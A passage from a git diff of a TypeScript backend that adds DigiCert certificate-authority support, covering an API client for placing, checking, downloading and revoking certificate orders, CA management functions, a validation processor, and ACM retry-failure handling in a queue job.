UnrecoverableError(message); + (wrapped as Error).cause = error; + throw wrapped; + } + throw error; } }; queueService.start(QueueName.CertificateIssuance, async (job) => { - await processCertificateIssuanceJobs(job.data); + try { + await processCertificateIssuanceJobs(job.data); + } catch (error) { + // AcmPendingError is rethrown on every retry so BullMQ keeps polling; the in-handler + // FAILED-update branch never runs for it. On the final attempt we still need to flip the request + // row to FAILED ourselves β€” BullMQ will move the job to the failed state but has no hook to + // update our DB, and no queue-level "failed" listener is wired for CertificateIssuance. + if (error instanceof AcmPendingError) { + const attemptsMade = job.attemptsMade ?? 0; + const maxAttempts = job.opts?.attempts ?? 1; + const isFinalAttempt = attemptsMade + 1 >= maxAttempts; + const { certificateRequestId, certificateId, caId } = job.data; + if (isFinalAttempt && certificateRequestId && certificateRequestService) { + try { + await certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId, + status: CertificateRequestStatus.FAILED, + errorMessage: `AWS ACM DNS validation did not complete after ${maxAttempts} attempts: ${error.message}` + }); + logger.info( + `Marked certificate request FAILED after exhausted ACM validation retries [certificateRequestId=${certificateRequestId}] [certificateId=${certificateId}] [caId=${caId}]` + ); + } catch (updateError) { + logger.error( + updateError, + `Failed to mark certificate request FAILED after exhausted ACM retries [certificateRequestId=${certificateRequestId}]` + ); + } + } + } + throw error; + } }); return { diff --git a/backend/src/services/certificate-authority/digicert/digicert-api-client.ts b/backend/src/services/certificate-authority/digicert/digicert-api-client.ts new file mode 100644 index 00000000000..c765f182d3c --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-api-client.ts @@ -0,0 +1,125 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { DIGICERT_AUTH_HEADER } from "@app/services/app-connection/digicert/digicert-connection-constants"; +import { extractDigiCertErrorMessage } from "@app/services/app-connection/digicert/digicert-connection-errors"; + +type TPlaceOrderRequest = { + certificate: { + common_name: string; + dns_names?: string[]; + csr: string; + signature_hash?: string; + }; + organization: { id: number }; + + order_validity: { days: number } | { years: number }; + dcv_method: "dns-txt-token"; + skip_approval?: boolean; + renewal_of_order_id?: number; +}; + +type TDigiCertDcvToken = { + token: string; + status?: string; + expiration_date?: string; +}; + +type TPlaceOrderResponse = { + id: number; + certificate_id?: number; + dcv_random_value?: string; + domains: { + id: number; + dns_name: string; + dcv_token?: TDigiCertDcvToken; + }[]; +}; + +type TOrderResponse = { + id: number; + status: string; + certificate?: { + id: number; + }; + dcv_method?: string; +}; + +type TCheckValidationResponse = { + order_status?: string; + certificate_id?: number; + dcv_status?: string; + dns_name_validations?: { + dns_name: string; + status: string; + }[]; +}; + +export type TDigiCertApiClient = ReturnType; + +export const createDigiCertApiClient = (apiKey: string, baseURL: string) => { + const headers = { + [DIGICERT_AUTH_HEADER]: apiKey, + "Content-Type": "application/json" + }; + + const wrap = (fn: () => Promise, action: string) => + fn().catch((error: unknown) => { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `DigiCert ${action} failed: ${extractDigiCertErrorMessage(error)}` + }); + } + throw error; + }); + + const placeOrder = async (productSlug: string, body: TPlaceOrderRequest) => + wrap(async () => { + const { data } = await request.post(`${baseURL}/order/certificate/${productSlug}`, body, { + headers + }); + return data; + }, `order placement for product ${productSlug}`); + + const getOrder = async (orderId: number) => + wrap(async () => { + const { data } = await request.get(`${baseURL}/order/certificate/${orderId}`, { + headers + }); + return data; + }, `order lookup for ${orderId}`); + + const checkValidation = async (orderId: number) => + wrap(async () => { + const { data } = await request.put( + `${baseURL}/order/certificate/${orderId}/check-dcv`, + null, + { headers } + ); + return data; + }, `validation check for order ${orderId}`); + + const downloadCertificatePem = async (certificateId: number) => + wrap(async () => { + const { data } = await request.get(`${baseURL}/certificate/${certificateId}/download/format/pem_all`, { + headers, + responseType: "text", + transformResponse: (res: string) => res + }); + return data; + }, `certificate download for ${certificateId}`); + + const revokeOrder = async (orderId: number, comments: string) => + wrap(async () => { + await request.put(`${baseURL}/order/certificate/${orderId}/revoke`, { comments }, { headers }); + }, `order revocation for ${orderId}`); + + return { + placeOrder, + getOrder, + checkValidation, + downloadCertificatePem, + revokeOrder + }; +}; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-enums.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-enums.ts new file mode 100644 index 00000000000..e872ea5fb02 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-enums.ts @@ -0,0 +1,15 @@ +export enum DigiCertOrderStatus { + Pending = "pending", + Approved = "approved", + Issued = "issued", + Revoked = "revoked", + Canceled = "canceled", + Rejected = "rejected", + Expired = "expired" +} + +export const DIGICERT_FINAL_ISSUED_STATUSES = [DigiCertOrderStatus.Issued] as const; + +export enum DigiCertProcessorOutcome { + Skipped = "skipped" +} diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-fns.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-fns.ts new file mode 100644 index 00000000000..bb5e1e004e9 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-fns.ts @@ -0,0 +1,726 @@ +/* eslint-disable no-await-in-loop */ +import * as x509 from "@peculiar/x509"; +import RE2 from "re2"; + +import { TableName } from "@app/db/schemas"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnectionCredentials } from "@app/services/app-connection/app-connection-fns"; +import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; +import { getDigiCertApiBaseUrl } from "@app/services/app-connection/digicert/digicert-connection-fns"; +import { TDigiCertConnection } from "@app/services/app-connection/digicert/digicert-connection-types"; +import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; +import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; +import { + CertExtendedKeyUsage, + CertExtendedKeyUsageOIDToName, + CertKeyAlgorithm, + CertKeyUsage, + CertStatus, + CrlReason, + TAltNameType +} from "@app/services/certificate/certificate-types"; +import { + DigiCertExternalMetadataSchema, + TDigiCertExternalMetadata +} from "@app/services/certificate-common/external-metadata-schemas"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns"; + +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { CaStatus, CaType } from "../certificate-authority-enums"; +import { keyAlgorithmToAlgCfg, parseDistinguishedName } from "../certificate-authority-fns"; +import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; +import { createDigiCertApiClient } from "./digicert-api-client"; +import { + TCreateDigiCertCertificateAuthorityDTO, + TDigiCertCertificateAuthority, + TDigiCertCertificateRequestMetadata, + TUpdateDigiCertCertificateAuthorityDTO +} from "./digicert-certificate-authority-types"; + +type TDigiCertCertificateAuthorityFnsDeps = { + appConnectionDAL: Pick; + appConnectionService: Pick; + certificateAuthorityDAL: Pick< + TCertificateAuthorityDALFactory, + "create" | "transaction" | "findByIdWithAssociatedCa" | "updateById" | "findWithAssociatedCa" | "findById" + >; + externalCertificateAuthorityDAL: Pick; + certificateDAL: Pick; + certificateBodyDAL: Pick; + certificateSecretDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; + projectDAL: Pick; +}; + +export const castDbEntryToDigiCertCertificateAuthority = ( + ca: Awaited> +): TDigiCertCertificateAuthority & { credentials: Buffer | null | undefined } => { + if (!ca.externalCa?.id) { + throw new BadRequestError({ message: "Malformed DigiCert certificate authority" }); + } + + if (!ca.externalCa.appConnectionId) { + throw new BadRequestError({ + message: "DigiCert app connection ID is missing from certificate authority configuration" + }); + } + + const config = (ca.externalCa.configuration ?? {}) as { + organizationId?: number; + productNameId?: string; + }; + + if (typeof config.organizationId !== "number" || !config.productNameId) { + throw new BadRequestError({ + message: "DigiCert certificate authority configuration is missing organization ID or product" + }); + } + + return { + id: ca.id, + type: CaType.DIGICERT, + enableDirectIssuance: ca.enableDirectIssuance, + name: ca.name, + projectId: ca.projectId, + credentials: ca.externalCa.credentials, + configuration: { + appConnectionId: ca.externalCa.appConnectionId, + organizationId: config.organizationId, + productNameId: config.productNameId + }, + status: ca.status as CaStatus + }; +}; + +const getDigiCertClientCredentials = async ( + appConnectionId: string, + appConnectionDAL: Pick, + kmsService: Pick +): Promise<{ apiKey: string; baseUrl: string }> => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `DigiCert app connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.DigiCert) { + throw new BadRequestError({ message: `App connection with ID '${appConnectionId}' is not a DigiCert connection` }); + } + + const credentials = (await decryptAppConnectionCredentials({ + orgId: appConnection.orgId, + projectId: appConnection.projectId, + encryptedCredentials: appConnection.encryptedCredentials, + kmsService + })) as TDigiCertConnection["credentials"]; + + return { + apiKey: credentials.apiKey, + baseUrl: getDigiCertApiBaseUrl(credentials.region) + }; +}; + +const PEM_CERTIFICATE_RE2 = new RE2("-----BEGIN CERTIFICATE-----[\\s\\S]*?-----END CERTIFICATE-----", "g"); + +const TTL_RE2 = new RE2("^(\\d+)([dhm])$"); +const parseTtlToDays = (ttl: string): number => { + const match = ttl.match(TTL_RE2); + if (!match) { + throw new BadRequestError({ message: `Invalid TTL format: ${ttl}` }); + } + const [, value, unit] = match; + const num = Number.parseInt(value, 10); + if (!Number.isFinite(num) || num <= 0) { + throw new BadRequestError({ message: `Invalid TTL value: ${ttl}` }); + } + switch (unit) { + case "d": + return num; + case "h": + return Math.max(1, Math.ceil(num / 24)); + case "m": + return Math.max(1, Math.ceil(num / (24 * 60))); + default: + throw new BadRequestError({ message: `Invalid TTL unit: ${unit}` }); + } +}; + +const extractIssuedCertificateFields = (certObj: x509.X509Certificate) => { + const subject = parseDistinguishedName(certObj.subject); + const commonName = subject.commonName ?? ""; + + const sanExt = certObj.getExtension("2.5.29.17"); + const altNames: string[] = []; + if (sanExt) { + const sanNames = new x509.GeneralNames(sanExt.value); + for (const item of sanNames.items) { + if ( + item.type === TAltNameType.DNS || + item.type === TAltNameType.IP || + item.type === TAltNameType.EMAIL || + item.type === TAltNameType.URL + ) { + altNames.push(item.value); + } + } + } + + const keyUsages: CertKeyUsage[] = []; + const keyUsagesExt = certObj.getExtension(x509.KeyUsagesExtension); + if (keyUsagesExt) { + for (const keyUsage of Object.values(CertKeyUsage)) { + // eslint-disable-next-line no-bitwise + if ((x509.KeyUsageFlags[keyUsage] & keyUsagesExt.usages) !== 0) { + keyUsages.push(keyUsage); + } + } + } + + const extendedKeyUsages: CertExtendedKeyUsage[] = []; + const ekuExt = certObj.getExtension(x509.ExtendedKeyUsageExtension); + if (ekuExt) { + for (const oid of ekuExt.usages) { + const mapped = CertExtendedKeyUsageOIDToName[oid as string]; + if (mapped) extendedKeyUsages.push(mapped); + } + } + + return { commonName, altNames, keyUsages, extendedKeyUsages }; +}; + +const extractLeafAndChain = (pemBundle: string): { leaf: string; chain: string } => { + const matches = pemBundle.match(PEM_CERTIFICATE_RE2); + if (!matches || matches.length === 0) { + throw new BadRequestError({ message: "DigiCert returned an empty certificate bundle" }); + } + + if (matches.length < 2) { + throw new BadRequestError({ + message: `DigiCert returned an incomplete certificate bundle (${matches.length} entry, expected leaf + chain)` + }); + } + + let leafIndex = -1; + matches.forEach((pem, index) => { + if (leafIndex !== -1) return; + try { + const cert = new x509.X509Certificate(pem); + const basicConstraints = cert.getExtension(x509.BasicConstraintsExtension); + if (!basicConstraints?.ca) leafIndex = index; + } catch { + // skip unparseable entries + } + }); + + if (leafIndex === -1) leafIndex = 0; + + const leaf = matches[leafIndex].trim(); + const chain = matches + .filter((_, index) => index !== leafIndex) + .map((cert) => cert.trim()) + .join("\n"); + return { leaf, chain }; +}; + +export const DigiCertCertificateAuthorityFns = ({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL +}: TDigiCertCertificateAuthorityFnsDeps) => { + const createCertificateAuthority = async ({ + name, + projectId, + configuration, + actor, + status + }: { + status: CaStatus; + name: string; + projectId: string; + configuration: TCreateDigiCertCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + }) => { + const { appConnectionId, organizationId, productNameId } = configuration; + + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `DigiCert app connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.DigiCert) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not a DigiCert connection` + }); + } + + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: appConnectionId, projectId }, + actor + ); + + const caEntity = await certificateAuthorityDAL.transaction(async (tx) => { + try { + const ca = await certificateAuthorityDAL.create( + { + projectId, + enableDirectIssuance: false, + name, + status + }, + tx + ); + + await externalCertificateAuthorityDAL.create( + { + caId: ca.id, + appConnectionId, + type: CaType.DIGICERT, + configuration: { + organizationId, + productNameId + } + }, + tx + ); + + return await certificateAuthorityDAL.findByIdWithAssociatedCa(ca.id, tx); + } catch (error) { + // 23505 = unique_violation β€” same CA name in the same project + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access, @typescript-eslint/no-explicit-any + if ((error as any)?.error?.code === "23505") { + throw new BadRequestError({ + message: "Certificate authority with the same name already exists in your project" + }); + } + throw error; + } + }); + + if (!caEntity.externalCa?.id) { + throw new BadRequestError({ message: "Failed to create external certificate authority" }); + } + + return castDbEntryToDigiCertCertificateAuthority(caEntity); + }; + + const updateCertificateAuthority = async ({ + id, + status, + configuration, + actor, + name + }: { + id: string; + status?: CaStatus; + configuration?: TUpdateDigiCertCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + name?: string; + }) => { + const updatedCa = await certificateAuthorityDAL.transaction(async (tx) => { + if (configuration) { + const { appConnectionId, organizationId, productNameId } = configuration; + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `DigiCert app connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.DigiCert) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not a DigiCert connection` + }); + } + + const ca = await certificateAuthorityDAL.findById(id); + if (!ca) { + throw new NotFoundError({ message: `Could not find Certificate Authority with ID "${id}"` }); + } + + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: appConnectionId, projectId: ca.projectId }, + actor + ); + + await externalCertificateAuthorityDAL.update( + { + caId: id, + type: CaType.DIGICERT + }, + { + appConnectionId, + configuration: { + organizationId, + productNameId + } + }, + tx + ); + } + + if (name || status) { + await certificateAuthorityDAL.updateById(id, { name, status }, tx); + } + + return certificateAuthorityDAL.findByIdWithAssociatedCa(id, tx); + }); + + if (!updatedCa.externalCa?.id) { + throw new BadRequestError({ message: "Failed to update external certificate authority" }); + } + + return castDbEntryToDigiCertCertificateAuthority(updatedCa); + }; + + const listCertificateAuthorities = async ({ + projectId, + permissionFilters + }: { + projectId: string; + permissionFilters?: ProcessedPermissionRules; + }) => { + const cas = await certificateAuthorityDAL.findWithAssociatedCa( + { + [`${TableName.CertificateAuthority}.projectId` as "projectId"]: projectId, + [`${TableName.ExternalCertificateAuthority}.type` as "type"]: CaType.DIGICERT + }, + {}, + permissionFilters + ); + + return cas.map(castDbEntryToDigiCertCertificateAuthority); + }; + + const orderCertificateFromProfile = async ({ + caId, + commonName, + altNames = [], + signatureAlgorithm, + keyAlgorithm = CertKeyAlgorithm.RSA_2048, + csr, + ttl, + renewalOfOrderId + }: { + caId: string; + commonName: string; + altNames?: string[]; + signatureAlgorithm?: string; + keyAlgorithm?: CertKeyAlgorithm; + csr?: string; + ttl: string; + renewalOfOrderId?: number; + }): Promise<{ + metadata: TDigiCertCertificateRequestMetadata; + privateKey: string; + immediateCertificateId?: number; + orderId: number; + }> => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.DIGICERT) { + throw new BadRequestError({ message: "CA is not a DigiCert certificate authority" }); + } + + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + if (digicertCa.status !== CaStatus.ACTIVE) { + throw new BadRequestError({ message: `DigiCert CA is disabled [caId=${caId}]` }); + } + + const { productNameId } = digicertCa.configuration; + + const effectiveCommonName = commonName?.trim() || altNames.find((value) => value.trim().length > 0)?.trim() || ""; + if (!effectiveCommonName) { + throw new BadRequestError({ + message: `DigiCert requires a common name or at least one DNS SAN [caId=${caId}]` + }); + } + + let csrPem = csr?.trim(); + let privateKeyPem = ""; + + if (!csrPem) { + const alg = keyAlgorithmToAlgCfg(keyAlgorithm); + const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); + const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey); + privateKeyPem = skLeafObj.export({ format: "pem", type: "pkcs8" }) as string; + + const csrObj = await x509.Pkcs10CertificateRequestGenerator.create({ + name: `CN=${effectiveCommonName}`, + keys: leafKeys, + signingAlgorithm: alg, + ...(altNames.length > 0 && { + extensions: [ + new x509.SubjectAlternativeNameExtension( + altNames.map((value) => ({ type: "dns" as TAltNameType, value })), + false + ) + ] + }) + }); + csrPem = csrObj.toString("pem"); + } + + const { apiKey, baseUrl } = await getDigiCertClientCredentials( + digicertCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + const client = createDigiCertApiClient(apiKey, baseUrl); + + const extraSans = altNames.filter((value) => value.toLowerCase() !== effectiveCommonName.toLowerCase()); + + const normalizedSignature = signatureAlgorithm?.toLowerCase() ?? ""; + let signatureHash: "sha256" | "sha384" | "sha512" = "sha256"; + if (normalizedSignature.includes("sha512")) signatureHash = "sha512"; + else if (normalizedSignature.includes("sha384")) signatureHash = "sha384"; + + const validityDays = parseTtlToDays(ttl); + + const baseOrderPayload = { + certificate: { + common_name: effectiveCommonName, + ...(extraSans.length > 0 ? { dns_names: extraSans } : {}), + csr: csrPem, + signature_hash: signatureHash + }, + organization: { id: digicertCa.configuration.organizationId }, + order_validity: { days: validityDays }, + dcv_method: "dns-txt-token" as const, + skip_approval: true + }; + + const renewalIneligibleCodes = [ + "order_not_eligible_for_renewal", + "order_not_renewable", + "renewal_window_closed", + "cannot_renew_expired_order", + "product_not_eligible_for_renewal" + ]; + let orderResponse: Awaited>; + try { + orderResponse = await client.placeOrder(productNameId, { + ...baseOrderPayload, + ...(renewalOfOrderId ? { renewal_of_order_id: renewalOfOrderId } : {}) + }); + } catch (err) { + const message = (err as Error)?.message ?? ""; + const isRenewalIneligible = + renewalOfOrderId !== undefined && renewalIneligibleCodes.some((code) => message.includes(code)); + if (isRenewalIneligible) { + logger.warn( + `DigiCert rejected renewal linkage (renewal_of_order_id=${renewalOfOrderId}) as not eligible; retrying as a fresh order [caId=${caId}]` + ); + orderResponse = await client.placeOrder(productNameId, baseOrderPayload); + } else { + throw err; + } + } + + return { + metadata: { + digicert: { + orderId: orderResponse.id, + certificateId: orderResponse.certificate_id, + productNameId, + organizationId: digicertCa.configuration.organizationId, + orderPlacedAt: new Date().toISOString() + } + }, + privateKey: privateKeyPem, + immediateCertificateId: orderResponse.certificate_id, + orderId: orderResponse.id + }; + }; + + const fetchAndAttachIssuedCertificate = async ({ + caId, + certificateRequest, + digicertCertificateId, + digicertOrderId, + encryptedPrivateKey, + isRenewal, + originalCertificateId + }: { + caId: string; + certificateRequest: { + id: string; + profileId?: string | null; + commonName?: string | null; + altNames?: string | null; + keyUsages?: string[] | null; + extendedKeyUsages?: string[] | null; + keyAlgorithm?: string | null; + signatureAlgorithm?: string | null; + }; + digicertCertificateId: number; + digicertOrderId: number; + encryptedPrivateKey?: Buffer; + isRenewal?: boolean; + originalCertificateId?: string; + }): Promise<{ certificateId: string; certificatePem: string }> => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.DIGICERT) { + throw new BadRequestError({ message: "CA is not a DigiCert certificate authority" }); + } + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + + const { apiKey, baseUrl } = await getDigiCertClientCredentials( + digicertCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + const client = createDigiCertApiClient(apiKey, baseUrl); + + const pemBundle = await client.downloadCertificatePem(digicertCertificateId); + const { leaf, chain } = extractLeafAndChain(pemBundle); + + const certObj = new x509.X509Certificate(leaf); + const issued = extractIssuedCertificateFields(certObj); + + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + const kmsEncryptor = await kmsService.encryptWithKmsKey({ kmsId: certificateManagerKmsId }); + + const { cipherTextBlob: encryptedCertificate } = await kmsEncryptor({ + plainText: Buffer.from(new Uint8Array(certObj.rawData)) + }); + const { cipherTextBlob: encryptedCertificateChain } = await kmsEncryptor({ + plainText: Buffer.from(chain) + }); + + const createdCertificateId = await certificateDAL.transaction(async (tx) => { + const cert = await certificateDAL.create( + { + caId: ca.id, + profileId: certificateRequest.profileId ?? undefined, + status: CertStatus.ACTIVE, + friendlyName: issued.commonName || "", + commonName: issued.commonName || "", + altNames: issued.altNames.length > 0 ? issued.altNames.join(",") : "", + serialNumber: certObj.serialNumber, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + keyUsages: issued.keyUsages, + extendedKeyUsages: issued.extendedKeyUsages, + keyAlgorithm: certificateRequest.keyAlgorithm ?? undefined, + signatureAlgorithm: certificateRequest.signatureAlgorithm ?? undefined, + projectId: ca.projectId, + externalMetadata: { + type: CaType.DIGICERT, + orderId: digicertOrderId + } satisfies TDigiCertExternalMetadata, + renewedFromCertificateId: isRenewal && originalCertificateId ? originalCertificateId : null + }, + tx + ); + + if (isRenewal && originalCertificateId) { + await certificateDAL.updateById(originalCertificateId, { renewedByCertificateId: cert.id }, tx); + } + + await certificateBodyDAL.create( + { + certId: cert.id, + encryptedCertificate, + encryptedCertificateChain + }, + tx + ); + + if (encryptedPrivateKey) { + await certificateSecretDAL.create( + { + certId: cert.id, + encryptedPrivateKey + }, + tx + ); + } + + return cert.id; + }); + + return { certificateId: createdCertificateId, certificatePem: leaf }; + }; + + const revokeCertificate = async ({ + caId, + serialNumber, + reason + }: { + caId: string; + serialNumber: string; + reason: CrlReason; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.DIGICERT) { + throw new BadRequestError({ message: `CA is not a DigiCert certificate authority [caId=${caId}]` }); + } + + const cert = await certificateDAL.findOne({ caId, serialNumber }); + if (!cert) { + throw new NotFoundError({ + message: `Certificate not found for revocation [caId=${caId}] [serialNumber=${serialNumber}]` + }); + } + const parsedMetadata = DigiCertExternalMetadataSchema.safeParse(cert.externalMetadata); + if (!parsedMetadata.success) { + throw new BadRequestError({ + message: `Certificate has no DigiCert order reference in externalMetadata β€” cannot revoke on DigiCert [certificateId=${cert.id}]` + }); + } + const { orderId } = parsedMetadata.data; + + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + const { apiKey, baseUrl } = await getDigiCertClientCredentials( + digicertCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + const client = createDigiCertApiClient(apiKey, baseUrl); + + try { + await client.revokeOrder(orderId, `Revoked via Infisical β€” reason: ${reason}`); + } catch (err) { + const message = (err as Error)?.message ?? ""; + if (message.includes("order_already_revoked") || message.includes("order_is_revoked")) { + logger.info( + `DigiCert order already revoked upstream β€” treating as success [caId=${caId}] [certificateId=${cert.id}] [orderId=${orderId}]` + ); + } else { + throw err; + } + } + + logger.info( + `DigiCert order revocation submitted [caId=${caId}] [certificateId=${cert.id}] [orderId=${orderId}] [reason=${reason}]` + ); + }; + + return { + createCertificateAuthority, + updateCertificateAuthority, + listCertificateAuthorities, + orderCertificateFromProfile, + fetchAndAttachIssuedCertificate, + revokeCertificate + }; +}; + +export type TDigiCertCertificateAuthorityFns = ReturnType; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-processor.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-processor.ts new file mode 100644 index 00000000000..737be4e9138 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-processor.ts @@ -0,0 +1,217 @@ +import { TCertificateRequests } from "@app/db/schemas"; +import { logger } from "@app/lib/logger"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnectionCredentials } from "@app/services/app-connection/app-connection-fns"; +import { getDigiCertApiBaseUrl } from "@app/services/app-connection/digicert/digicert-connection-fns"; +import { TDigiCertConnection } from "@app/services/app-connection/digicert/digicert-connection-types"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; + +import { CertificateRequestStatus } from "../../certificate-common/certificate-constants"; +import { TCertificateRequestDALFactory } from "../../certificate-request/certificate-request-dal"; +import { + TAttachCertificateToRequestDTO, + TUpdateCertificateRequestStatusDTO +} from "../../certificate-request/certificate-request-types"; +import { TResourceMetadataDALFactory } from "../../resource-metadata/resource-metadata-dal"; +import { copyMetadataFromRequestToCertificate } from "../../resource-metadata/resource-metadata-fns"; +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { createDigiCertApiClient, TDigiCertApiClient } from "./digicert-api-client"; +import { + DIGICERT_FINAL_ISSUED_STATUSES, + DigiCertOrderStatus, + DigiCertProcessorOutcome +} from "./digicert-certificate-authority-enums"; +import { + castDbEntryToDigiCertCertificateAuthority, + TDigiCertCertificateAuthorityFns +} from "./digicert-certificate-authority-fns"; +import { DigiCertCertificateRequestMetadataSchema } from "./digicert-certificate-authority-schemas"; + +export type TDigiCertCertificateRequestServiceDep = { + updateCertificateRequestStatus: (args: TUpdateCertificateRequestStatusDTO) => Promise; + attachCertificateToRequest: (args: TAttachCertificateToRequestDTO) => Promise; +}; + +export const DIGICERT_VALIDATION_TIMEOUT_MS = 24 * 60 * 60 * 1000; + +export type TDigiCertOrderMetadata = { + digicert: { + orderId: number; + certificateId?: number; + productNameId: string; + organizationId: number; + orderPlacedAt: string; + lastCheckedAt?: string; + lastCheckStatus?: string; + isRenewal?: boolean; + originalCertificateId?: string; + }; +}; + +export type TProcessDigiCertRequestDeps = { + certificateAuthorityDAL: Pick; + appConnectionDAL: Pick; + kmsService: Pick; + certificateRequestDAL: Pick; + certificateRequestService: TDigiCertCertificateRequestServiceDep; + resourceMetadataDAL: Pick; + digicertFns: Pick; +}; + +export type TProcessDigiCertRequestResult = + | { status: CertificateRequestStatus.ISSUED; certificateId: string; orderStatus: string } + | { status: CertificateRequestStatus.FAILED; orderStatus: string; reason: string } + | { status: CertificateRequestStatus.PENDING_VALIDATION; orderStatus: string } + | { status: DigiCertProcessorOutcome.Skipped; reason: string }; + +const getOrCreateClient = async ( + request: TCertificateRequests, + deps: Pick, + clientCache?: Map +): Promise => { + if (!request.caId) { + throw new Error(`certificate request is missing caId [certificateRequestId=${request.id}]`); + } + const cached = clientCache?.get(request.caId); + if (cached) return cached; + + const ca = await deps.certificateAuthorityDAL.findByIdWithAssociatedCa(request.caId); + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + const appConnection = await deps.appConnectionDAL.findById(digicertCa.configuration.appConnectionId); + if (!appConnection || appConnection.app !== AppConnection.DigiCert) { + throw new Error( + `DigiCert app connection missing or invalid [certificateRequestId=${request.id}] [caId=${request.caId}]` + ); + } + const credentials = (await decryptAppConnectionCredentials({ + orgId: appConnection.orgId, + projectId: appConnection.projectId, + encryptedCredentials: appConnection.encryptedCredentials, + kmsService: deps.kmsService + })) as TDigiCertConnection["credentials"]; + + const client = createDigiCertApiClient(credentials.apiKey, getDigiCertApiBaseUrl(credentials.region)); + clientCache?.set(request.caId, client); + return client; +}; + +export const processDigiCertPendingValidationRequest = async ( + deps: TProcessDigiCertRequestDeps, + request: TCertificateRequests, + clientCache?: Map +): Promise => { + if (!request.caId || !request.metadata) { + return { status: DigiCertProcessorOutcome.Skipped, reason: "missing caId or metadata" }; + } + + let rawMetadata: unknown; + try { + rawMetadata = JSON.parse(request.metadata); + } catch { + logger.warn(`DigiCert request metadata could not be parsed [certificateRequestId=${request.id}]`); + return { status: DigiCertProcessorOutcome.Skipped, reason: "unparseable metadata" }; + } + + const parseResult = DigiCertCertificateRequestMetadataSchema.safeParse(rawMetadata); + if (!parseResult.success) { + logger.warn( + { err: parseResult.error }, + `DigiCert request metadata failed schema validation [certificateRequestId=${request.id}]` + ); + return { status: DigiCertProcessorOutcome.Skipped, reason: "metadata did not match schema" }; + } + const parsed = parseResult.data as TDigiCertOrderMetadata; + + const age = Date.now() - new Date(parsed.digicert.orderPlacedAt).getTime(); + if (age >= DIGICERT_VALIDATION_TIMEOUT_MS) { + await deps.certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId: request.id, + status: CertificateRequestStatus.FAILED, + errorMessage: "Validation timed out after 24h" + }); + logger.info(`DigiCert validation timed out [certificateRequestId=${request.id}]`); + return { 